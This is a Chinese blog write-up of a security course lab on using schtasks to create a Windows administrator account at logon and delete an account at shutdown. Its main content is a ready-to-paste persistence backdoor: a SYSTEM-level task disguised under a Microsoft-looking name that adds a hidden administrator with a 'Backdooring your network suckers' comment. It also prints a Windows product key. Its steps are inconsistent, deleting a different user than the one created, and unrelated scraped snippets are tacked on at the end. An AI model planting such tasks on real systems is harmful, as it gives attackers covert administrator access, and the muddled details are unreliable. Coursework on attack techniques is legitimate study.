网络攻防任务二:开机、关机事件触发账户的创建与删除

一、任务要求

设计一个以开机、关机事件为触发条件的计划任务,实现:

1、开机时新建一个用户

2、关机时删除用户

二、解决步骤

(一)实验环境搭建

事件触发的命令是schtasks。

利用schtasks完成的功能主要是:利用确定的日志事件触发net user命令,以达到新增一个管理员账户的目的。

如果利用传统的at命令,首先无法用日志事件触发,其次需要执行多条命令行时,只能将它们编写成.bat的批处理文件进行处理。

由于要用到事件触发,xp没有这个功能,所以要新建一个win7的虚拟机。

Win7激活秘钥为YKHFT KW986 GK4PY FDWYH 7TP9F

(二)开机创建用户

Schtasks的用法描述:

允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任

务。

参数列表:

/Create         创建新计划任务。

/Delete         删除计划任务。

/Query          显示所有计划任务。

/Change         更改计划任务属性。

/Run            按需运行计划任务。

/End            中止当前正在运行的计划任务。

/ShowSid        显示与计划的任务名称相应的安全标识符。

/?              显示此帮助消息。

Examples:

SCHTASKS

SCHTASKS /?

SCHTASKS /Run /?

SCHTASKS /End /?

SCHTASKS /Create /?

SCHTASKS /Delete /?

SCHTASKS /Query  /?

SCHTASKS /Change /?

SCHTASKS /ShowSid /?

开机事件的事件ID为4624,因此代码如下:

schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name=‘Microsoft-Windows-Security-Auditing‘] and EventID=4624]]"

直接在命令行窗口下输入这行代码即可。

重启的时候有登录窗口,原因是关机的时候账户未删。

(三)关机删除用户

经查询关机事件ID为1074。

代码如下:

schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

关机之前先检查一下账户情况

重启之后,结果如下图所示,账户已被删除。

开机后,再输入net user,可以看到账户在开机之后也建立成功了。

原文地址:https://www.cnblogs.com/cyx-b/p/11487845.html

时间: 2024-08-29 06:53:54

网络攻防任务二:开机、关机事件触发账户的创建与删除的相关文章

网络事件触发自己主动登录

通过接收REACHABILITY_RECOVE_NOTIFICATION通知来获取网络状态.可是在弱网络下可能出现收不到通知的情况,iphone 4s有时候也出现收不到网络通知的情况.其他90%以上的情况都能收到网络通知. 登录时能够依据该通知来触发自己主动登录.防止没有收到网络通知就登录,导致登录失败,不能显示正常网络提示:也避免了起定时器等待一段时间在登录的不及时及耗电量问题(起线程非常费电). 而且用停止网络检查立马启动网络检查会出现.收到两次网络正常通知(若网络正常的情况下) :[g_r

网络事件触发自动登录

通过接收REACHABILITY_RECOVE_NOTIFICATION通知来获取网络状态,但是在弱网络下可能出现收不到通知的情况,iphone 4s有时候也出现收不到网络通知的情况,其它90%以上的情况都能收到网络通知. 登录时可以根据该通知来触发自动登录,防止没有收到网络通知就登录,导致登录失败,不能显示正常网络提示:也避免了起定时器等待一段时间在登录的不及时及耗电量问题(起线程很费电).并且用停止网络检查立刻启动网络检查会出现,收到两次网络正常通知(若网络正常的情况下) :[g_reach

《网络攻防》第七周学习总结

Kali教材学习 本周主要学习了<网络攻防---技术与实践>第7章的内容,主要学习了 Windows操作系统安全攻防         Windows操作系统基本框架 如上图所示,Windows操作系统分为运行于处理器特权模式(ring 0)的操作系统内核,以及运行在处理器非特权模式(ring 3)的用户空间代码.采用宏内核(monolithic)模式进行架构.内核基本模块分为:Windows执行体 .Windows内核体 .设备驱动程序 .硬件抽象层 .Windows窗口与图形界面内核实现代码

20155201 网络攻防技术 实验九 Web安全基础

20155201 网络攻防技术 实验九 Web安全基础 一.实践内容 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 二.报告内容: 1. 基础问题回答 1)SQL注入攻击原理,如何防御 SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息. SQL注入攻击的典型手段:判断应用程序是否存在注入漏洞,收集信息

20189224 《网络攻防实践》/《网络攻击与防范》第十周学习总结

20189224 <网络攻防实践>/<网络攻击与防范>第十周学习总结 冯·诺依曼体系结构和图灵机 图灵机是一个计算机的理论模型,本质上是状态机:冯诺依曼体系是图灵机的实现,包括运算.控制.存储.输入.输出五个部分.诺依曼体系相对之前的计算机最大的创新在于程序和数据的存储,以此实现机器内部编程. 图灵机的纸带应对应诺依曼计算机体系中的存储,读写头对应输入和输出,规则(读了一个符号后下一步做什么)对应运算,纸带怎么移动对应控制. 图灵机 图灵机(Turing Machine)是图灵在1

C#捕获windows关机事件,在系统关机前做一些自己想做的事

C#捕获windows关机事件,在系统关机前做一些自己想做的事: 有些时候我们可能想在Windows关机时记录或处理一些事情,这里提供几种方法. 方法一: /// <summary> /// 窗口过程的回调函数 /// </summary> /// <param name="m"></param> protected override void WndProc(ref Message m) { switch (m.Msg) { //此消息

20169217 2016-2017-2 《网络攻防实践》第五周学习总结

教材内容总结及扩展 Web体系结构 Web体系结构,是相对于网站静态内容而言,是指以c/c++.php.Java.perl..net等服务器端语言开发的网络应用软件,比如论坛.网络相册.交友.BLOG等常见应用.动态应用系统通常与数据库系统.缓存系统.分布式存储系统等密不可分. 大型动态应用系统平台主要是针对于大流量.高并发网站建立的底层系统架构.大型网站的运行需要一个可靠.安全.可扩展.易维护的应用系统平台做为支撑,以保证网站应用的平稳运行. 大型动态应用系统又可分为几个子系统: 1)Web前

《网络攻防》第六周学习总结

教材学习 第五章--TCP/IP网络协议攻击 TCP/IP网络协议栈攻击概述 网络安全属性与攻击模式 网络安全属性:机密性,完整性,可用性,真实性,不可抵赖性 网络攻击基本模式: 截获 篡改 中断 伪造 TCP/IP网络协议栈安全缺陷与攻击技术 网络接口层,互联层,传输层,应用层(P141表格5-1) 原始报文伪造技术及工具 Netwox:强大且易用的开源工具包,可以创建任意的TCP/UDP/IP数据报文 Netwag:GUI界面,发送伪造的欺骗数据包. 网络层协议攻击 IP源地址欺骗 IP源地

信息安全技术 实验五 网络攻防技术 20155202 张旭

信息安全技术 实验五 网络攻防技术 20155202 练习一 信息收集 一. 实验目的 该实验为验证性实验. ? 了解信息搜集的一般步骤 ? 学会熟练使用ping命令 ? 学会利用Nmap等工具进行信息搜集 二. 实验内容 Ping探测 Nmap扫描 探测总结 注:详细实验操作请参考实验室服务器上的参考资料. 三. 实验步骤 本练习主机A.B为一组,C.D为一组,E.F为一组.实验角色说明如下: 实验主机 实验角色 系统环境 A.C.E 扫描源/目标 Windows B.D.F 扫描源/目标 L